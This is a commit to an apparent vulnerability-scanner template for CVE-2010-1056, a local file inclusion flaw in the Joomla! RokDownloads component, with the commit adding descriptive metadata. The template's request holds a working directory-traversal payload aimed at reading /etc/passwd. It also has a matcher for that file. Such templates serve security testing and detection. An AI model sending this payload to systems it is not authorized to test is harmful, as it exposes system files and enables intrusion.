Enhancement: cves/2010/CVE-2010-1056.yaml by mp

patch-1
MostInterestingBotInTheWorld 2022-02-13 13:52:07 -05:00
parent 5f7bddc723
commit 09bee5b5c0
1 changed files with 5 additions and 6 deletions

View File

@ -1,27 +1,26 @@
id: CVE-2010-1056
info:
name: Joomla! Component com_rokdownloads - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
remediation: remediation: Apply all relevant security patches and product upgrades.
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1056
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/13